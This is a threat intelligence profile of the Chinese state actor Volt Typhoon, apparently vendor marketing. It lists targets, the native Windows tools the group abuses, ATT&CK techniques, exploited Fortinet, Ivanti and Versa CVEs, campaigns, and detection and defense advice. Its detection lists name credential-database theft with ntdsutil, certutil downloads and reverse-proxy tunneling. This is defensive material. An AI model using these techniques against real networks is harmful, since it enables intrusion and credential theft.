Volt Typhoon
PRC State-Sponsored Actor Pre-Positioning in U.S. Critical Infrastructure
Volt Typhoon is a PRC state-sponsored threat actor that has maintained persistent access to U.S. critical infrastructure networks for over five years. Unlike traditional espionage-focused APTs, their primary objective is pre-positioning for potential disruption or destruction during a future geopolitical crisis—particularly a conflict over Taiwan.
Attribution & Identity
Volt Typhoon is assessed with high confidence to be a People's Republic of China (PRC) state-sponsored cyber actor. This assessment is based on joint advisories from CISA, NSA, FBI, and Five Eyes partners, as well as a reported admission by Chinese officials at a December 2024 Geneva summit confirming cyberattacks against U.S. infrastructure in response to U.S. support for Taiwan.
Unlike traditional espionage-focused APTs, Volt Typhoon's primary objective is pre-positioning within critical systems to enable potential disruption or destruction during a future geopolitical crisis. The group is distinguished by its extensive use of living-off-the-land (LOTL) techniques, avoiding custom malware in favor of native system tools that blend with normal administrative activity.
They heavily abuse compromised SOHO routers and edge devices to proxy their traffic and obscure their origin. In December 2025, congressional testimony confirmed that Volt Typhoon continues actively targeting U.S. power grid systems.
Targeting Profile
Volt Typhoon's targeting is strategically focused on systems that would be critical during a military conflict, particularly those supporting U.S. force projection in the Pacific theater.
🎯 Target Sectors
- Communications / Telecom
- Energy / Utilities
- Water & Wastewater
- Transportation
- Maritime / Ports
- Manufacturing
- Government
- Information Technology
🌍 Target Regions
- United States (Primary)
- Guam (Critical Focus)
- U.S. Pacific Territories
- Australia (Confirmed)
- Allied Nations
💻 Target Technologies
- Fortinet FortiOS/FortiGate
- Ivanti Connect Secure
- Versa Director
- SOHO Routers (Various)
- Active Directory
- SCADA/ICS Systems
- OT Networks
Strategic Intent: Taiwan Contingency
U.S. government assesses Volt Typhoon's goal is to slow or prevent U.S. military response to a potential Chinese invasion of Taiwan by disrupting critical infrastructure. Their focus on Guam—a key military staging point—underscores this assessment. Some environments have been compromised for over 5 years with focus on obtaining access to OT/SCADA systems and documentation.
Signature Tradecraft: Living Off The Land
Volt Typhoon is notable for avoiding custom malware, instead relying on native system tools. This makes detection extremely difficult as their activity blends with legitimate administrative operations.
| Tool | Purpose | Detection Challenge |
|---|---|---|
cmd.exe |
Command execution | Ubiquitous system tool |
powershell.exe |
Scripting, enumeration | Legitimate admin use |
wmic.exe |
Remote execution, discovery | Common management tool |
ntdsutil.exe |
AD database extraction | Legitimate AD admin tool |
netsh.exe |
Firewall, port forwarding | Network administration |
certutil.exe |
File download, encoding | Certificate management |
7-Zip |
Archive with password | Common compression tool |
⌨️ Hands-on-Keyboard Activity
Volt Typhoon operators conduct real-time, hands-on intrusions rather than deploying automated scripts. This makes their activity harder to detect but also slower and more deliberate.
MITRE ATT&CK Techniques
Initial Access
- Exploit Public-Facing Application T1190
- External Remote Services T1133
Execution
- PowerShell T1059.001
- Windows Command Shell T1059.003
- WMI T1047
Persistence
- Valid Accounts T1078
- Scheduled Task T1053.005
Defense Evasion
- System Binary Proxy Execution T1218
- Indicator Removal T1070
- Masquerading T1036
Credential Access
- NTDS T1003.003
- LSASS Memory T1003.001
- Password Stores T1555
Lateral Movement
- Remote Desktop T1021.001
- SMB/Windows Shares T1021.002
- WinRM T1021.006
Command & Control
- External Proxy T1090.002
- Protocol Tunneling T1572
Collection
- Archive via Utility T1560.001
- Local Data T1005
Exploited Vulnerabilities
Volt Typhoon heavily targets network edge devices, particularly from Fortinet, Ivanti, and Versa. Organizations using these products should prioritize patching.
| CVE | Product | Type | CVSS |
|---|---|---|---|
| CVE-2024-39717 | Versa Director | File Upload (Zero-Day) | 7.2 |
| CVE-2024-21762 | Fortinet FortiOS SSL VPN | Out-of-Bounds Write | 9.8 |
| CVE-2024-23113 | Fortinet FortiOS | Format String | 9.8 |
| CVE-2023-27997 | Fortinet FortiOS | Buffer Overflow | 9.8 |
| CVE-2022-42475 | Fortinet FortiOS SSL VPN | Buffer Overflow | Critical |
| CVE-2022-40684 | Fortinet FortiOS | Auth Bypass | Critical |
| CVE-2024-21887 | Ivanti Connect Secure | Command Injection | 9.1 |
| CVE-2023-46805 | Ivanti Connect Secure | Auth Bypass | 8.2 |
Download Full Threat Actor Profile
Complete technical analysis including IOCs, detection rules, and MITRE ATT&CK mapping.
Download PDF — FreeNotable Campaigns
KV Botnet Campaign (C0035)
Compromise of end-of-life SOHO routers (Cisco RV320/325, NETGEAR, DrayTek Vigor) to create a botnet for proxying malicious traffic. FBI disrupted the botnet in January 2024, but it was subsequently revived and remains active.
Versa Director Zero-Day (C0039)
Exploitation of CVE-2024-39717 zero-day in Versa Director to deploy VersaMem web shell against Internet Service Providers and Managed Service Providers, enabling downstream access to customer environments.
Critical Infrastructure Pre-Positioning
Ongoing campaign to establish and maintain persistent access to U.S. critical infrastructure. Some environments compromised for over 5 years. Focus on obtaining access to OT/SCADA systems and documentation.
Detection & Response
Detection Opportunities
LOTL Tool Anomalies
- cmd.exe spawned by unusual parent processes
- PowerShell with encoded commands
- ntdsutil.exe creating IFM snapshots
- certutil.exe downloading files
- netsh port forwarding commands
Network Indicators
- Traffic to known compromised SOHO routers
- FRP (Fast Reverse Proxy) connections
- Unusual outbound connections from servers
- SMB lateral movement patterns
Authentication Anomalies
- Admin account "fortinet-tech-support"
- Off-hours domain admin activity
- Logons from unusual source IPs
- Service accounts with interactive logons
File System Artifacts
- .gif files containing archives (masquerading)
- Password-protected 7z archives
- NTDS.dit copies in unusual locations
- VersaMem web shell artifacts
Defensive Recommendations
Patch Edge Devices Immediately
Prioritize Fortinet, Ivanti, and Versa vulnerabilities. These are primary initial access vectors.
Replace EOL SOHO Routers
Upgrade devices no longer receiving security updates. These are exploited for botnet infrastructure.
Implement Network Segmentation
Isolate OT/SCADA from IT networks. This limits blast radius if compromise occurs.
Monitor LOTL Tool Usage
Baseline and alert on administrative tool execution patterns to detect anomalies.
Enable Enhanced Logging
PowerShell script block logging, WMI, and process creation events are essential for detection.
Hunt for Long-Term Persistence
Assume compromise if running vulnerable devices. Proactively hunt for 5+ year dwell times.
Track Volt Typhoon with BRACE
BRACE delivers monthly sector-specific threat intelligence covering Volt Typhoon activity, including:
- Volt Typhoon campaign analysis and targeting patterns
- Detection rules for LOTL techniques and edge device compromise
- MITRE ATT&CK mappings for nation-state TTPs
- Sector-specific threat hunting playbooks
- IOCs and behavioral indicators
Download Complete Volt Typhoon Intelligence
Get the full threat actor profile including IOCs, detection queries, and CISA advisory references.
Download PDF — FreeProtect Your Critical Infrastructure
BRACE delivers monthly threat intelligence on Volt Typhoon and 175+ threat groups with sector-specific detection rules, MITRE ATT&CK mapping, and hunting playbooks.